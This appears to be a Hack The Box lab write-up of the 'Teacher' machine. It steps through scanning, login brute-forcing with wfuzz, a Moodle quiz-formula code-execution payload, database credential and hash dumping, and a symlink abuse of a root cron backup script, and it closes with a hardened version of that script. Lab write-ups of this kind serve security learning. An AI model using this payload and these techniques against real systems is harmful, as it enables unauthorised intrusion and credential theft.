Today we’re going to solve another CTF machine, “Teacher”. It is now a retired box and can be accessed if you’re a VIP member.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.153
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we’re gonna identify the target and see what services are listening behind the IP address.

nmap -sS -sU -T4 -A -v 10.10.10.153

Enumeration

Let’s do some enumeration and browse URL http://10.10.10.153/

We have to do directory enumeration to find hidden directories or files.

Dirb

dirb http://10.10.10.153 -o /root/Documents/hackthebox/10.10.10.153/scans/10.10.10.153_dirb.txt

Result

DIRECTORY: http://10.10.10.153/moodle/

We found the Moodle CMS installed at http://10.10.10.153/moodle/.

After that we have to log in to move forward, but we don’t have credentials; only the guest:guest login works.

Let’s find a username first. A simple technique is the forgot-password form: enter candidate usernames and see whether the site confirms that a reset email has been sent for that username. That confirmation tells us the username exists.

I found two usernames: admin and giovanni.

Now we have to enumerate more in order to find the password.

Let’s take a look at the page source (view-source:http://10.10.10.153/gallery.html) and see if there’s anything odd.

In the source we see an image tag with onerror="console.log('That\'s an F');"

Let’s take a look at the image!

Now curl this image and see what it’s hiding.

curl -O http://10.10.10.153/images/5.png

The file is not a real PNG but plain text, so we can rename 5.png to 5.txt and cat it.

Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

We have a partial password, Th4C00lTheacha, but it’s incomplete: we don’t know its last character.

Creating a Wordlist Using Crunch

We’re gonna create different wordlists in order to find the last character of our password (crunch fills ^ with symbols, @ with lowercase letters, , with uppercase letters and % with digits).

crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha^ -o wordlist1.txt
crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha@ -o wordlist2.txt
crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha, -o wordlist3.txt
crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha% -o wordlist4.txt

WFuzz

We can also use the SecLists fuzzing wordlist alphanum-case-extra.txt with wfuzz, hiding the responses whose size (--hh) and word count (--hw) match a failed login.

wfuzz -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt --hh 440 -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" --hw 1224 http://10.10.10.153/moodle/login/index.php

We found our password: Th4C00lTheacha#

Low-Privilege Shell

We have found credentials for the Moodle CMS; let’s move forward and find a way to exploit it.

https://blog.ripstech.com/2018/moodle-remote-code-execution/

After logging in and prodding around the environment, we stumble across a page that lets us upload custom questions for a quiz. This is exactly the page we needed: the research linked above has shown that this version of Moodle has a security flaw which allows a teacher to execute code through the custom quiz creation.

Let’s get started!

Log in to Moodle

Username: giovanni Password: Th4C00lTheacha#

Go to http://10.10.10.153/moodle/course/view.php?id=2 and click Turn editing on.

After that click on Add an activity or resource.

A pop-up window will appear asking which activity or resource to add; select Quiz and click Add.

Now, name your quiz and click save.

Now, click on Edit quiz, then click on a new question.

A pop-up window will appear; select Calculated and click Add.

Now, in the Formula field, enter /*{a*/`$_GET[0]`;//{x}}

After clicking Save changes we can get a reverse shell.

Now that we have a low-privilege shell, let’s upgrade it to a proper TTY.

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$

First, let’s look around the Moodle source tree for the config file.

www-data@teacher:/var/www/html/moodle$ cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

We got the database credentials: root:Welkom1!

Connect to the MariaDB console with them.

www-data@teacher:/var/www/html/moodle$ mysql -u root -pWelkom1! -D moodle
MariaDB [moodle]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
5 rows in set (0.00 sec)

Let’s look inside the moodle database for a users table (or similar) where credentials might be stored.

MariaDB [moodle]> select * from mdl_user;
(output trimmed to the relevant columns)
+------+--------+-------------+--------------------------------------------------------------+------------+----------+------------+---------------+
| id   | auth   | username    | password                                                     | firstname  | lastname | lastaccess | lastip        |
+------+--------+-------------+--------------------------------------------------------------+------------+----------+------------+---------------+
|    1 | manual | guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | Guest user |          |          0 |               |
|    2 | manual | admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | Admin      | User     | 1530059573 | 192.168.206.1 |
|    3 | manual | giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | Giovanni   | Chhatta  | 1550655334 | 10.10.13.113  |
| 1337 | manual | Giovannibak | 7a860966115182402ed06375cf0a22af                             |            |          |          0 |               |
+------+--------+-------------+--------------------------------------------------------------+------------+----------+------------+---------------+
4 rows in set (0.00 sec)

The Giovannibak account has an unsalted MD5 hash (the other accounts use bcrypt, $2y$), so let’s look it up with online crackers first.

7a860966115182402ed06375cf0a22af : expelled

Let’s try switching to the giovanni user in our reverse shell with that password.

www-data@teacher:/var/www/html/moodle$ su giovanni
Password: expelled

giovanni@teacher:/var/www/html/moodle$

We can now read the user.txt flag.

giovanni@teacher:~$ cat user.txt
fa9ae187462530e841d9e61936648fa7

Privilege Escalation

After checking a few things we found a cron job executing as root. We can use the pspy tool to watch process creation and see the cron job run within a few seconds.

giovanni@teacher:/tmp$ ./pspy32s
...
2019/02/20 11:42:01 CMD: UID=0    PID=3273   | /bin/bash /usr/bin/backup.sh
...
giovanni@teacher:~$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

The script runs as root, tars courses/* from a directory giovanni owns, extracts the archive and then makes everything world-writable. Let’s create a symlink named courses pointing at /root so the cron job copies root’s files for us.

giovanni@teacher:~/work$ ln -s /root courses
giovanni@teacher:~/work$ ls -l
total 8
lrwxrwxrwx 1 giovanni giovanni 5 Apr 16 17:00 courses -> /root
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses.bak
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp

Let the cron job do its thing and wait for root’s files to show up in tmp/courses, now readable by everyone.

giovanni@teacher:~/work/tmp/courses$ ls -l
total 8
drwxrwxrwx 2 root root 4096 Jun 27 2018 algebra
-rwxrwxrwx 1 root root 33 Jun 27 2018 root.txt
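The root cause here is the backup script itself: it cd’s into a user-owned directory, globs courses/* (so a symlink named courses is followed as root), and then chmod 777’s everything it extracted. As an added example (not the box’s script), here is a hardened replacement that refuses symlinked sources, uses a fixed name instead of a glob so tar never reads through a link, and keeps the extracted files private. It assumes the work directory is passed as $1 and defaults to /home/giovanni/work.

```shell
# Hardened replacement for /usr/bin/backup.sh (added example, not the box's script).
# Assumption: the work directory is $1, defaulting to /home/giovanni/work.

# Refuse a source that is itself a symlink or contains a top-level symlink.
safe_source() {
    src="$1"
    [ -d "$src" ] || return 1
    [ -L "$src" ] && return 1
    if find "$src" -maxdepth 1 -type l | grep -q .; then
        return 1
    fi
    return 0
}

# Create and unpack the backup without following links or loosening permissions.
backup_courses() {
    work="${1:-/home/giovanni/work}"
    src="$work/courses"
    dst="$work/tmp/backup_courses.tar.gz"

    if ! safe_source "$src"; then
        echo "refusing to back up $src: symlink found" >&2
        return 2
    fi

    mkdir -p "$work/tmp"
    umask 077      # extracted files stay private to the owner, never 777
    # -C instead of cd, a fixed name instead of a glob: tar stores a symlink
    # as a link and never reads through it, so /root cannot be pulled in.
    tar -czf "$dst" -C "$work" courses || return 3
    tar -xzf "$dst" -C "$work/tmp" || return 3
    return 0
}
```

Even with these checks, a root cron job should not operate inside a directory an unprivileged user can write to; moving the work tree under a root-owned path removes the symlink race entirely.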